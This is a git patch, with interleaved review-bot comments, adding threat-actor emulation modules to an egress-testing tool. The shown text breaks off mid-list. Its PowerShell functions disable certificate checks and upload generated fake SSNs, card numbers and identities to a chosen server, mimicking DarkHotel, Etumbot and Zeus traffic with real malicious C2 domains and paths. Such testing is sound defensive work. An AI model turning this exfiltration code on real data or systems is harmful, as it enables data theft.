From cbe3fcc0f43b7cd8ddc9b4986ea2a232ab8db983 Mon Sep 17 00:00:00 2001
From: Chris Truncer
Date: Mon, 16 Nov 2015 07:42:26 -0700
Subject: [PATCH] Merge of our malware modules into Egress-Assess
---
Egress-Assess.py | 46 +
Invoke-EgressAssess.ps1 => EgressAssess.ps1 | 1483 +++++++++++++----
commandcontrol/__init__.py | 0
commandcontrol/apt/__init__.py | 0
commandcontrol/apt/darkhotel.py | 89 +
commandcontrol/apt/etumbot.py | 96 ++
commandcontrol/apt/putterpanda.py | 108 ++
commandcontrol/malware/__init__.py | 0
commandcontrol/malware/zeus.py | 279 ++++
common/helpers.py | 21 +-
common/orchestra.py | 15 +-
protocols/clients/https_client.py | 10 -
.../servers/serverlibs/web/base_handler.py | 97 +-
.../serverlibs/web/malware_callbacks.py | 208 +++
14 files changed, 2076 insertions(+), 376 deletions(-)
rename Invoke-EgressAssess.ps1 => EgressAssess.ps1 (92%)
create mode 100644 commandcontrol/__init__.py
create mode 100644 commandcontrol/apt/__init__.py
create mode 100644 commandcontrol/apt/darkhotel.py
create mode 100644 commandcontrol/apt/etumbot.py
create mode 100644 commandcontrol/apt/putterpanda.py
create mode 100644 commandcontrol/malware/__init__.py
create mode 100644 commandcontrol/malware/zeus.py
create mode 100644 protocols/servers/serverlibs/web/malware_callbacks.py
diff --git a/Egress-Assess.py b/Egress-Assess.py
index ab1e62d..286077b 100755
--- a/Egress-Assess.py
+++ b/Egress-Assess.py
@@ -48,8 +48,31 @@ if __name__ == "__main__": print sys.exit() + elif cli_parsed.list_actors: + print "[*] Supported malware/APT groups: \n" + the_conductor.load_actors(cli_parsed) + for name, datatype_module in the_conductor.actor_modules.iteritems(): + print "[+] " + datatype_module.cli + " - (" +\ + datatype_module.description + ")" + print + sys.exit() + if cli_parsed.server is not None: the_conductor.load_server_protocols(cli_parsed) + the_conductor.load_actors(cli_parsed) + + # Check if server module is given threat actor vs. normal server + for actor_path, actor_mod in the_conductor.actor_modules.iteritems(): + + # If actor module is what is used, search for the server requirement + # and load that + if actor_mod.cli == cli_parsed.server.lower(): + + for full_path, server_actor in the_conductor.server_protocols.iteritems(): + + if server_actor.protocol.lower() == actor_mod.server_requirement: + server_actor.serve() + for full_path, server in the_conductor.server_protocols.iteritems(): 
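Review bot: In the new `if cli_parsed.server is not None:` branch, `server_actor.serve()` is called from inside the actor-matching loop and control then falls through to the pre-existing `for full_path, server in the_conductor.server_protocols.iteritems():` loop, so when `--server` names an actor the matching protocol server appears to be started by both loops (this depends on whether `serve()` blocks and on the body of the original loop, which is outside the hunk). A `break` or `sys.exit()` after `server_actor.serve()`, or a flag checked by the original loop, would make the two paths exclusive. The comparison `server_actor.protocol.lower() == actor_mod.server_requirement` lower-cases only one side; normalise both, e.g. `if server_actor.protocol.lower() == actor_mod.server_requirement.lower():`. In the `--list-actors` block the loop variable `datatype_module` holds an actor module, so renaming it `actor_module` would keep the listing readable. The enclosing `if __name__ == "__main__":` block continues outside the hunk.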
@@ -86,3 +109,26 @@ if __name__ == "__main__": print "[*] Error: You either didn't provide a valid datatype or client protocol to use." print "[*] Error: Re-run and use --list-datatypes or --list-clients to see possible options." sys.exit() + + elif cli_parsed.actor is not None: + # Load different threat actors/malware + the_conductor.load_actors(cli_parsed) + + # Identify the actor to emulate + for full_path, actor_variant in the_conductor.actor_modules.iteritems(): + if actor_variant.cli == cli_parsed.actor.lower(): + + # Check if generating data or using data within the actor module + if cli_parsed.datatype is not None: + the_conductor.load_datatypes(cli_parsed) + + # Generate the data for the actor to exfil + for name, datatype_module in the_conductor.datatypes.iteritems(): + if datatype_module.cli == cli_parsed.datatype.lower(): + generated_data = datatype_module.generate_data() + + actor_variant.emulate(data_to_exfil=generated_data) + + # Instead, use the exfil data within the module + else: + actor_variant.emulate() diff --git a/Invoke-EgressAssess.ps1 b/EgressAssess.ps1 similarity index 92% rename from Invoke-EgressAssess.ps1 rename to EgressAssess.ps1 index 2be94f5..8e87617 100644 --- a/Invoke-EgressAssess.ps1 +++ b/EgressAssess.ps1 @@ -1,10 +1,10 @@ function Invoke-EgressAssess { + <# .Synopsis Egress-assess powershell client. - Script created by @rvrsh3ll @christruncer @harmj0y @sixdub .Description This script will connect to an Egress-assess server and transfer faux Personally Identifiable Information or 
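Review bot: In the new `elif cli_parsed.actor is not None:` branch, `generated_data` is assigned only when a datatype module's `cli` equals `cli_parsed.datatype.lower()`, so an unrecognised `--datatype` reaches `actor_variant.emulate(data_to_exfil=generated_data)` with the name unbound and dies with a NameError instead of the usage error the preceding branch prints. Initialise `generated_data = None` before the loop and, if it is still `None` afterwards, print the existing `[*] Error: ... --list-datatypes ...` message and `sys.exit()`. Nothing is reported either when `cli_parsed.actor` matches no loaded module; a `found` flag set inside the actor loop, with a `--list-actors` hint when it stays false, would mirror the error handling above. The enclosing `if __name__ == "__main__":` block starts outside the hunk.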
@@ -21,18 +21,24 @@ function Invoke-EgressAssess .Parameter ResolveDNS Switch to enable DNS resolution for ICMP transfers +.Parameter NoPing + Disable ping check + .Parameter Proxy This switch is used when you need to exfiltrate data using the system proxy +.Parameter UserAgent + Assign a specific UserAgent ("IE","Moz","Saf"). Default's to random + +.Parameter Actor + Assign a malware profile to your traffic + .Parameter Username The username for the ftp server .Parameter Password The password for the ftp server -.Parameter NoPing - Disable the server ping check - .Parameter Datatype The string containing the data you want to generate and exfil May contain filepath to transfer file @@ -57,19 +63,23 @@ function Invoke-EgressAssess #> [CmdletBinding()] Param ( - [Parameter(Mandatory = $True)] + [Parameter(Mandatory = $False)] [string]$Client, [Parameter(Mandatory = $True)] [string]$IP, [Parameter(Mandatory = $False)] [switch]$ResolveDNS, [Parameter(Mandatory = $False)] + [switch]$NoPing, + [Parameter(Mandatory = $False)] [switch]$Proxy, + [Parameter(Mandatory = $False)] + [string]$UserAgent, + [Parameter(Mandatory = $False)] + [string]$Actor, [Parameter(Mandatory = $True, ValueFromPipeline = $True)] [string]$Datatype, [Parameter(Mandatory = $False)] - [switch]$NoPing, - [Parameter(Mandatory = $False)] [string]$Username, [Parameter(Mandatory = $False)] [string]$Password, 
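Review bot: `$Client` is made optional (`Mandatory = $False`) but receives no default, while the actor functions added later in this patch assign `$Url` only when `$client -eq "http"` or `"https"`, so `-Actor` without `-Client` reaches `New-Object -TypeName System.Uri -ArgumentList $Url` with `$Url` unset and fails there rather than with a usage message. Either give it a default, `[string]$Client = "http",`, or reject the combination up front in `begin`, e.g. `if (-not $Client -and -not $Actor) { throw "Specify -Client or -Actor" }`. The `.Parameter UserAgent` help lists the accepted values, so `[ValidateSet("IE", "Moz", "Saf")]` on `[string]$UserAgent` would enforce what the help promises. The Param block continues outside the hunk.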
@@ -80,32 +90,31 @@ function Invoke-EgressAssess [Parameter(Mandatory = $False)] [string]$Report ) - begin { #stop looping errors $ErrorActionPreference = "Stop" - + #get start time $startTime = (Get-Date) - - #checks if Egress-Assess server is running + + #checks if Egress-Assess server is running using ICMP ping function Test-ServerConnection { Write-Verbose "[*] Testing server connection" $socketTcp = New-Object Net.Sockets.TcpClient - $socketUdp = New-Object System.Net.Sockets.UdpClient + $socketUdp = New-Object System.Net.Sockets.UdpClient $ping = $(Test-Connection -ComputerName $IP -Count 1 -Quiet) - if($ping -eq $true) + if ($ping -eq $true) { Write-Verbose "[*] Server is UP on $IP." - if($client -eq "icmp") - { + if ($client -eq "icmp") + { #Potential future verification of icmp server/sniffer running Write-Verbose "[*] ICMP server *possibly* running." Return } - elseif($client -eq "dnstxt" -or $client -eq "dnsresolved") + elseif ($client -eq "dnstxt" -or $client -eq "dnsresolved") { <#Note: Need to troubleshoot DNS checks more. $port = 53 @@ -130,19 +139,19 @@ function Invoke-EgressAssess } else { - if($client -eq "http") + if ($client -eq "http") { $port = 80 } - elseif($client -eq "https") + elseif ($client -eq "https") { $port = 443 } - elseif($client -eq "ftp") + elseif ($client -eq "ftp") { $port = 21 } - elseif($client -eq "sftp") + elseif ($client -eq "sftp") { $port = 22 } 
@@ -150,24 +159,31 @@ function Invoke-EgressAssess { $port = 25 } - elseif($client -eq "smb") + elseif ($client -eq "smb") { $port = 445 } - else + else { Write-Verbose "[*] Protocol not available." throw "Error" } - + #attempt to test connection to TCP ports try { - $socketTcp.Connect($ip,$port) - } catch{} - + $socketTcp.Connect($ip, $port) + } + catch + { + $ErrorMessage = $_.Exception.Message + Write-Verbose "[*] Error, tranfer failed with error:" + Write-Verbose $ErrorMessage + Break + } + #connect to server if running - if($socketTcp.Connected) + if ($socketTcp.Connected) { Write-Verbose "[*] $($client.toUpper()) Server Running on $IP port $port." $socketTcp.close() @@ -177,13 +193,13 @@ function Invoke-EgressAssess Write-Verbose "[*] $($client.toUpper()) Server Not Running on $IP. Start server." throw "Error" } - } + } } - else + else { Write-Verbose "[*] Server is DOWN on $IP." throw "Error" - } + } } @@ -212,6 +228,7 @@ function Invoke-EgressAssess function Generate-CreditCards { + $script:AllCC = @() $stringBuilder = New-Object System.Text.StringBuilder $script:list = New-Object System.Collections.Generic.List[System.String] @@ -264,8 +281,9 @@ function Invoke-EgressAssess } $script:AllCC = $list.ToArray() } - - function Generate-Names { + + function Generate-Identity + { $script:AllNames = @() $FirstNames = @('michael', 'john', 'david', 'chris', 'mike', 'james', 'mark', 'jason', 'robert', 'jessica', 'sarah', 'jennifer', @@ -275,7 +293,7 @@ function Invoke-EgressAssess 'mary', 'adam', 'melissa', 'matthew', 'nick', 'stephanie', 'anthony', 'tom', 'josh', 'laura', 'tim', 'jim', 'amy', 'peter', 'dan', 'nicole', 'tony') - + $LastNames = @('smith', 'johnson', 'jones', 'williams', 'brown', 'lee', 'khan', 'singh', 'kumar', 'miller', 'davis', 'wilson', 'taylor', 'thomas', 'garcia', 'anderson', 'sharma', 'martin', 
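Review bot: The new `catch` in Test-ServerConnection ends with `Break`, but there is no loop in that function: in PowerShell a `break` outside a loop unwinds to the nearest enclosing loop up the call stack and, finding none, ends the script, so a refused TCP connect now terminates Invoke-EgressAssess with only a verbose message instead of the `throw "Error"` every other failure path in this function uses. Replace `Break` with `throw "Error"` after the two `Write-Verbose` lines so callers keep a single failure contract, and close `$socketTcp` on that path as the `$socketTcp.Connected` branch does. The string `"[*] Error, tranfer failed with error:"` misspells transfer, and the same string is copied into each actor function later in the patch, so fix it here and there together. Test-ServerConnection begins outside the hunk.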
@@ -284,7 +302,7 @@ function Invoke-EgressAssess 'hernandez', 'clark', 'lewis', 'robinson', 'young', 'gonzalez', 'hall', 'wright', 'scott', 'perez', 'green', 'allen', 'tan', 'shah', 'roberts', 'adams', 'nguyen', 'james', 'hill') - + $Addresses = @('PO Box 4927 Montgomery, AL 36103', 'PO Box 110801 Juneau, AK 99811-0801', '1110 W. Washington Street, Suite 155 Phoenix, AZ 85007', 'One Capitol Mall Little Rock, AR 72201', @@ -327,8 +345,7 @@ function Invoke-EgressAssess '110 3rd Street Lenoir, NC 28645', '488 Schoolhouse Lane Johnston, RI 02919', '658 Market Street New Brunswick, NJ 08901') - - + $list = New-Object System.Collections.Generic.List[System.String] $num = [math]::Round(($Size * 1MB)/69) $percentcount = 0 @@ -341,14 +358,14 @@ function Invoke-EgressAssess Write-Verbose "$percent% Done! $i Name-Sets Generated" $percentcount += 1 } - $First = Get-Random -InputObject $FirstNames - $Last = Get-Random -InputObject $LastNames - $Address = Get-Random -InputObject $Addresses - $SSN = "$(Get-Random -minimum 100 -maximum 999)-$(Get-Random -minimum 10 -maximum 99)-$(Get-Random -minimum 1000 -maximum 9999)" - $TextInfo = (Get-Culture).TextInfo - $r = "$($TextInfo.ToTitleCase($First.ToLower()) + " " + $TextInfo.ToTitleCase($Last.ToLower()) + " $Address" + " $SSN")" - $s = Get-Random -InputObject $r - $list.Add($s) + $First = Get-Random -InputObject $FirstNames + $Last = Get-Random -InputObject $LastNames + $Address = Get-Random -InputObject $Addresses + $SSN = "$(Get-Random -minimum 100 -maximum 999)-$(Get-Random -minimum 10 -maximum 99)-$(Get-Random -minimum 1000 -maximum 9999)" + $TextInfo = (Get-Culture).TextInfo + $r = "$($TextInfo.ToTitleCase($First.ToLower()) + " " + $TextInfo.ToTitleCase($Last.ToLower()) + " $Address" + " $SSN")" + $s = Get-Random -InputObject $r + $list.Add($s) } $script:AllNames = $list.ToArray() } 
@@ -358,22 +375,721 @@ function Invoke-EgressAssess $global:FileTransfer = $True if (!(Test-Path -Path $Datatype)) { Throw "File doesnt exist" } } - - function Use-HTTP + ################################### + # Begin Malware Signatures # + ################################### + function Use-DarkHotel { + $domains = @('micronaoko.jumpingcrab.com', 'microchsse.strangled.net', + 'microbrownys.strangled.net', 'microplants.strangled.net', + 'microlilics.crabdance.com') + $uris = @('/bin/read_i.php?a1=step2-down-b&a2=KJNSDFkjmdfH&a3=SW5mb1N5c0BVc2VyIE1ZQ09NUFVURVJATXlVc2VyICgwODUwKUMgUCBVIDogSW50ZWwoUikgQ29yZShUTSkgaTMtMTY2N1UgQ1BVIEAgMTYwMEdIelN5c3RlbSBPUzogTWljcm9zb2Z0IFdpbmRvd3MgWFAgKFNlcnZpY2UgUGFjayAzKU5ldCBjYXJkIDogMTkyLjE2OC4wLjIgKDEzMzc3MzMxMTMzNyk=&a4=KS', + '/bin/read_i.php?a1=step2-down-r&a2=KDYEMDYWM&a3=SW5mb1N5c0BVc2VyIE1ZQ09NUFVURVJATXlVc2VyICgwODUwKUMgUCBVIDogSW50ZWwoUikgQ29yZShUTSkgaTctMTY2N1UgQ1BVIEAgMTYwMEdIelN5c3RlbSBPUzogTWljcm9zb2Z0IFdpbmRvd3MgNyAoU2VydmljZSBQYWNrIDIpTmV0IGNhcmQgOiAxOTIuMTY4LjI1LjIgKDEzMzc3MzMxMTMzNyk=&a4=TR', + '/bin/read_i.php?a1=step2-down-u&a2=YEMDGEJEIMD&a3=SW5mb1N5c0BVc2VyIFdvcmtzdGF0aW9uQFNvbm9mRmx5bm4gKDA4NTApQyBQIFUgOiBJbnRlbChSKSBDb3JlKFRNKSBpNy0xNTBVIENQVSBAIDE2MDBHSHpTeXN0ZW0gT1M6IE1pY3Jvc29mdCBXaW5kb3dzIDguMSAoU2VydmljZSBQYWNrIDEpTmV0IGNhcmQgOiAxOTIuMTY4LjMzLjIgKDEzMzc3MzMxMTMzNyk=&a4=BD', + '/bin/read_i.php?a1=step2-down-c&a2=MSNETJ&a3=SW5mb1N5c0BVc2VyIFNFUlZFUkRDQEFETUlOICgwODUwKUMgUCBVIDogSW50ZWwoUikgQ29yZShUTSkgaTctOTBVIENQVSBAIDIwMDBHSHpTeXN0ZW0gT1M6IE1pY3Jvc29mdCBXaW5kb3dzIDEwIE5ldCBjYXJkIDogMTkyLjE2OC4xMzMuMiAoMTMzNzczMzExMzM3KQ==&a4=AST', + '/bin/read_i.php?a1=step2-down-k&a2=VSEJKNEF&a3=SW5mb1N5c0BVc2VyIERCQURCQFNZU0RCQSAoMDg1MClDUFUgOiBJbnRlbChSKSBDb3JlKFRNKSBpNy05MCBDUFUgQCAzMjAwR0h6U3lzdGVtIE9TOiBNaWNyb3NvZnQgV2luZG93cyBTZXJ2ZXIgMjAwMyBOZXQgY2FyZCA6IDE5Mi4xNjguMTUzLjIgKDEzMzc3MzMxMTMzNyk=&a4=NOD' + 
'/bin/read_i.php?a1=step2-down-j&a2=ALFDOEJNKF&a3=SW5mb1N5c0BVc2VyIERBZG1pbkBEQ1N5cyAoMDk1MClDUFUgOiBJbnRlbChSKSBDb3JlKFRNKSBpNy05MDAgQ1BVIEAgMzgwMUdIelN5c3RlbSBPUzogTWljcm9zb2Z0IFdpbmRvd3MgU2VydmVyIDIwMDggTmV0IGNhcmQgOiAxOTIuMTY4LjE5My4yICgxMzM3NzMzMTEzMzcp&a4=NV') + $checkinDomains = @('autolace.twilightparadox.com', 'automachine.servequake.com') + + # Detect what datatype we're sending if ($Datatype -contains "ssn" -or "cc" -or "identity") { - $totalupload = 0 - if ($Datatype -eq "ssn") { + + if ($Datatype -eq "ssn") + { Generate-SSN $Data = $AllSSN } - elseif ($Datatype -eq "cc") { + elseif ($Datatype -eq "cc") + { Generate-CreditCards $Data = $AllCC } - elseif ($Datatype -eq "identity") { - Generate-Names + elseif ($Datatype -eq "identity") + { + Generate-Identity + $Data = $AllNames + } + + } + else + { + Write-Verbose "[*] You did not provide a data type to generate." + Return + } + Do + { + try + { + Try + { + # Checkin Request 1 + + if ($client -eq "http") + { + $Url = "http://" + $IP + "/major/images/view.php" + } + elseif ($client -eq "https") + { + $Url = "https://" + $IP + "/major/images/view.php" + } + $ranHost = Get-Random -InputObject $checkinDomains + [Net.ServicePointManager]::ServerCertificateValidationCallback = { $true } + $uri = New-Object -TypeName System.Uri -ArgumentList $Url + $wc = New-Object -TypeName System.Net.WebClient + Write-Verbose $uri + $wc.Headers.Add('Accept', '*/*') + $wc.Headers.Add('User-Agent', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)') + $wc.Headers.Add('Host', $ranHost) + $wc.Headers.Add('Pragma', 'no-cache') + Write-Verbose "Uploading data..." 
+ $wc.UploadString($uri, $Data) + } + catch + { + $ErrorMessage = $_.Exception.Message + Write-Verbose "[*] Error, tranfer failed with error:" + Write-Verbose $ErrorMessage + Break + } + + # Checkin Request 2 + if ($client -eq "http") + { + $Url = "http://" + $IP + "/major/txt/read.php" + } + elseif ($client -eq "https") + { + $Url = "https://" + $IP + "/major/txt/read.php" + } + $ranHost = Get-Random -InputObject $checkinDomains + [Net.ServicePointManager]::ServerCertificateValidationCallback = { $true } + $uri = New-Object -TypeName System.Uri -ArgumentList $Url + $wc = New-Object -TypeName System.Net.WebClient + Write-Verbose $uri + $wc.Headers.Add('Accept', '*/*') + $wc.Headers.Add('User-Agent', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)') + $wc.Headers.Add('Host', $ranHost) + $wc.Headers.Add('Pragma', 'no-cache') + Write-Verbose "Uploading data..." + $wc.UploadString($uri, $Data) + } + catch + { + $ErrorMessage = $_.Exception.Message + Write-Verbose "[*] Error, tranfer failed with error:" + Write-Verbose $ErrorMessage + Break + } + # Main transfer + $localLoop = 5 + Do + { + $ranURI = Get-Random -InputObject $uris + if ($client -eq "http") + { + $Url = "http://" + $IP + $ranURI + } + elseif ($client -eq "https") + { + $Url = "https://" + $IP + $ranURI + } + $ranHost = Get-Random -InputObject $checkinDomains + [Net.ServicePointManager]::ServerCertificateValidationCallback = { $true } + $uri = New-Object -TypeName System.Uri -ArgumentList $Url + $wc = New-Object -TypeName System.Net.WebClient + Write-Verbose $uri + $wc.Headers.Add('Accept', '*/*') + $wc.Headers.Add('User-Agent', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)') + $wc.Headers.Add('Host', $ranHost) + $wc.Headers.Add('Pragma', 'no-cache') + Write-Verbose "Uploading data..." 
+ $wc.UploadString($uri, $Data) + $localLoop-- + } + While ($localLoop -gt 0) + + Write-Verbose "[*] Transfer complete!" + $loops-- + Write-Verbose "[*] $loops loops remaining.." + } + While ($loops -gt 0) + } + + function Use-Etumbot + { + $domains = @('200.27.173.58', '200.42.69.140', '92.54.232.42', '133.87.242.63', + '98.188.111.244', 'intro.sunnyschool.com.tw', '143.89.145.156', + '198.209.212.82', '143.89.47.132', '196.1.199.15', + 'wwap.publiclol.com', '59.0.249.11', '190.16.246.129', '211.53.164.152', 'finance.yesplusno.com') + $encodedString = @('dGhpc2lzYXRlc3RzdHJpbmdkb250Y2F0Y2htZQ--', + 'Y2F0Y2hldHVtYm90aWZ5b3VjYW4-', + 'Z29oYWxleWdvYW5kaGFja2F3YXl0aGVnaWJzb24-', + 'bHVrZXJlYWxseWlzdGhlbWFubXl0aGFuZGxlZ2VuZA--', + 'd2h5aXNwZW5uc3RhdGVzb2JhZGF0Zm9vdGJhbGw-', + 'U2VtaW5vbGVzd291bGRkZXN0cm95cGVubnN0YXRl', + 'dGhlYnJvbmNvc2FyZWJldHRlcnRoYW5yYXZlbnM-', + 'bm90cmVkYW1lY2hlYXRzdG93aW4-', + 'dGhlU2VtaW5vbGVzYmVhdG5vcmVkYW1l', + 'YmpwZW5uaXNhbmF3ZXNvbWVmaWdodGVy') + $uris = @($("/image/" + $(Get-Random -InputObject $encodedString) + ".jpg"), + $("/history/" + $(Get-Random -InputObject $encodedString) + ".asp"), + $("/manage/asp/item.asp?id=" + $(Get-Random -InputObject $encodedString) + "&&mux=" + $(Get-Random -InputObject $encodedString)), + $("/article/30441/Review.asp?id=" + $(Get-Random -InputObject $encodedString) + "&&date=" + $(Get-Random -InputObject $encodedString)), + $("/tech/s.asp?m=" + $(Get-Random -InputObject $encodedString))) + + # Detect what datatype we're sending + if ($Datatype -contains "ssn" -or "cc" -or "identity") + { + + if ($Datatype -eq "ssn") + { + Generate-SSN + $Data = $AllSSN + } + elseif ($Datatype -eq "cc") + { + Generate-CreditCards + $Data = $AllCC + } + elseif ($Datatype -eq "identity") + { + Generate-Identity + $Data = $AllNames + } + + } + else + { + Write-Verbose "[*] You did not provide a data type to generate." 
+ Return + } + Do + { + # Checkin Request + if ($client -eq "http") + { + $Url = "http://" + $IP + "/home/index.asp?typeid=13" + } + elseif ($client -eq "https") + { + $Url = "https://" + $IP + "/home/index.asp?typeid=13" + } + $ranHost = Get-Random -InputObject $domains + [Net.ServicePointManager]::ServerCertificateValidationCallback = { $true } + $uri = New-Object -TypeName System.Uri -ArgumentList $Url + $wc = New-Object -TypeName System.Net.WebClient + Write-Verbose $uri + $wc.Headers.Add('Accept', 'text/html,application/xhtml+xml,application/xml,q=0.9,*/*;q=0.8') + $wc.Headers.Add('User-Agent', 'Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/5.0)') + $wc.Headers.Add('Host', $ranHost) + $wc.Headers.Add('Referrer', 'http://www.google.com') + $wc.Headers.Add('Cache-Control', 'no-cache') + $wc.Headers.Add('Pragma', 'no-cache') + Write-Verbose "Uploading data..." + $wc.UploadString($uri, $Data) + + + # Main transfer + $localLoop = 5 + Do + { + Write-Verbose "Looping 5 times" + + $ranURI = Get-Random -InputObject $uris + if ($client -eq "http") + { + $Url = "http://" + $IP + $ranURI + } + elseif ($client -eq "https") + { + $Url = "https://" + $IP + $ranURI + } + $ranHost = Get-Random -InputObject $domains + [Net.ServicePointManager]::ServerCertificateValidationCallback = { $true } + $uri = New-Object -TypeName System.Uri -ArgumentList $Url + $wc = New-Object -TypeName System.Net.WebClient + Write-Verbose $uri + $wc.Headers.Add('Accept', 'text/html,application/xhtml+xml,application/xml,q=0.9,*/*;q=0.8') + $wc.Headers.Add('User-Agent', 'Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/5.0)') + $wc.Headers.Add('Host', $ranHost) + $wc.Headers.Add('Referrer', 'http://www.google.com') + $wc.Headers.Add('Cache-Control', 'no-cache') + $wc.Headers.Add('Pragma', 'no-cache') + Write-Verbose "Uploading data..." + $wc.UploadString($uri, $Data) + $localLoop-- + } + While ($localLoop -gt 0) + + + Write-Verbose "[*] Transfer complete!" 
+ $loops-- + Write-Verbose "[*] $loops loops remaining.." + } + While ($loops -gt 0) + } + ## End Eumbot + + function Use-Zeus + { + $domains = @('0x.x.gg', '6pjddrtt7.com', 'apexholdngs.com', 'baoshlda.com', + 'bestdove.in.ua', 'championbft.com', 'codedtunes.zapto.org', + 'cooldomainname.ws', 'danislenefc.info', 'dau43vt5wtrd.tk', + 'diosdelared.com.mx', 'emaillifecoaching.com.au', 'emekonline.tk', + 'eresimgbo.com', 'escoesco.info', 'fileserver03.com', + 'finsolutions.top', 'fronty2073.net', 'genmjob3.ru', + 'gjiayimeiya.com', 'gorainbowzone.tk', 'hope-found-now.net', + 'hruner.com', 'hui-ain-apparel.tk', 'ice.ip64.net', + 'interglobalswiss.info', 'jomo.in.ua', 'juyteche.tk', + 'kesikelyaf.com', 'legitvendors.ru', 'lion.web2.0campus.net', + 'liveresellerweb.eu', 'mccc-investconsultant.com', 'muazymaur.tk', + 'mymytonnymaxltd.org', 'mypic.hopto.org', 'mystartap.com', + 'neease.com', 'ns513726.ip-192-99-148.net', + 'panel.vargakragard.se', 'polyaire-au.com', + 'projects.globaltronics.net', 'regame.su', 'richus.ru', + 'server.bovine-mena.com', 'ssl.sinergycosmetics.com', + 'sslsam.com', 'sus.nieuwmoer.info', 'tesab.org.uk', + 'up.frigo2000.it', 'update.odeen.eu', 'update.rifugiopontese.it', + 'urchilaa.com', 'winscoft.com', 'www.nikey.cn', + 'www.riverwalktrader.co.za', 'www.witkey.com', 'zabava-bel.ru') + $uris = @('/jm32/includes/site/bot.exe', '/jm32/includes/site/config.bin', + '/jm32/includes/site/gate.php', '/mathew/config.jpg', + '/docs/.docs/config.jpg', '/docs/.docs/do.php', + '/zeujuus/a/gate.php', '/zeujuus/a/modules/bot.exe', + '/zeujuus/a/modules/config.bin', + '/zejius/2HZG41Zw/6Vtmo6w4yQ5tnsBHms64.php', + '/zejius/2HZG41Zw/bot.exe', + '/zejius/2HZG41Zw/fJsnC6G4sFg2wsyn4shb.bin', + '/zejius/5GPR0iy9/6Vtmo6w4yQ5tnsBHms64.php', + '/zejius/5GPR0iy9/bot.exe', + '/zejius/5GPR0iy9/fJsnC6G4sFg2wsyn4shb.bin', '/past/config.jpg', + '/past/gate.php', '/fan/base/config.jpg', + '/wp-includes/pomo/panel/config.jpg', + '/wp-includes/pomo/panel/gate.php', 
'/themes/panel/config.jpg', + '/themes/panel/gate.php', '/home/libraries/joomla/php/gate.php', + '/home/plugins/system/tmp/bot.scr', + '/home/plugins/system/tmp/config.bin', + '/home/plugins/system/tmp/gate.php', '/js/ssj/config.jpg', + '/js/ssj/gate.php', '/site/tmp/xml/config.jpg', + '/site/tmp/xml/gate.php', '/news/wpg.php', '/file.php', + '/.cgi-bin./as.bin', '/wp-content/themes/bmw_lab/new.ban', + '/wp-content/themes/bmw_lab/newnew.wav', '/vs/panel/config.jpg', + '/vs/panel/gate.php', '/brand/server/file.php', + '/brand/server/gate.php', + '/wp-admin/css/colors/sunrise/admin/bot.exe', + '/wp-admin/css/colors/sunrise/admin/config.bin', + '/wp-admin/css/colors/sunrise/admin/secure.php', + '/wp-content/themes/chagim/library/images/plates/bot.exe', + '/wp-content/themes/chagim/library/images/plates/config.bin', + '/wp-content/themes/chagim/library/images/plates/gate.php', + '/images/burr_insurance001001.php', '/images/team/config.jpg', + '/images/team/gate.php', '/test/config.jpg', '/test/gate.php', + '/ray/server/file.php', '/ray/server/gate.php', '/capa.bin', + '/capa.exe', '/secure.php', '/ral/30/config.bin', + '/ral/30/secure.php', '/wp-admin/css/config.bin', + '/wp-admin/css/gate.php', '/wp-admin/css/setup.exe', + '/panel/config.jpg', '/panel/gate.php', + '/wp-includes2/SimplePie/Net/page/config.jpg', + '/wp-includes2/SimplePie/Net/page/gate.php', + '/includes/.srv/srv/bot.exe', + '/includes/.srv/srv/config.bin', '/includes/.srv/srv/gate.php', + '/ric/30/config.bin', '/ric/30/secure.php', '/blog/crea.bin', + '/blog/crea.exe', '/blog/secure.php', '/images2/dave.jpg', + '/images2/gate.php', '/wp-includes/ID3/config.jpg', + '/wp-includes/ID3/gate.php', '/emman/panel/config.jpg', + '/emman/panel/gate.php', '/xampp/img/escu.bin', + '/xampp/img/escu.exe', '/xampp/img/secure.php', + '/.css/config.jpg', '/.css/gate.php', '/admin/cfg.bin', + '/admin/gate.php', '/isai/modules/mod_upgrade/bot.exe', + '/isai/modules/mod_upgrade/config.bin', + 
'/isai/modules/mod_upgrade/gate.php', '/wp-comment/firs.jpg', + '/wp-comment/gate.php', '/panel/file.php', '/panel/gate.php', + '/images01/fong.bin', '/images01/fong.exe', '/images01/gate.php', + '/img/vg.php', '/components/com_file/file.php', + '/components/com_file/gate.php', '/images/panel/config.jpg', + '/images/panel/gate.php', '/wordpress/gate.php', + '/wordpress/gree.jpg', '/media/.tmp/file.php', + '/media/.tmp/gate.php', '/gate.php', '/modules/holl.bin', + '/modules/holl.exe', '/templates/admin/install/config.jpg', + '/templates/admin/install/gate.php', + '/tmp/admin/install/config.jpg', '/tmp/admin/install/gate.php', + '/tmp/cp/config.jpg', '/tmp/cp/gate.php', + '/tmp/install/config.jpg', '/tmp/install/gate.php', + '/frank/panel/config.jpg', '/frank/panel/gate.php', + '/tmp/configs/new/vg.php', '/meask/lite/file.php', + '/meask/lite/gate.php', '/css/src/admin/config.jpg', + '/css/src/admin/gate.php', '/js/admin/install/config.jpg', + '/js/admin/install/gate.php', + '/wp-content/plugins/wp-db-backup-made/work.php', + '/update/bot.exe', '/update/cfg.bin', '/update/gate.php', + '/chopinschumann/ital.bin', '/chopinschumann/ital.exe', + '/chopinschumann/secure.php', '/images/ital.bin', + '/images/ital.exe', '/images/secure.php', + '/compose/panel/bot.exe', '/compose/panel/config.bin', + '/compose/panel/secure.php', '/fy97/panel/config.bin', + '/fy97/panel/secure.php', '/images/joea.bin', '/images/joea.exe', + '/images/secure.php', '/components/com_joomla/plugin/config.jpg', + '/components/com_joomla/plugin/gate.php', + '/resource/css/config.bin', '/resource/css/secure.php', + '/wp-content/upgrade/PANEL/config.jpg', + '/wp-content/upgrade/PANEL/gate.php', + '/wp-content/plugins/bcet56aoikqf52iu/food.php', + '/Scripts/_notes/build/bot.exe', + '/Scripts/_notes/build/config.bin', + 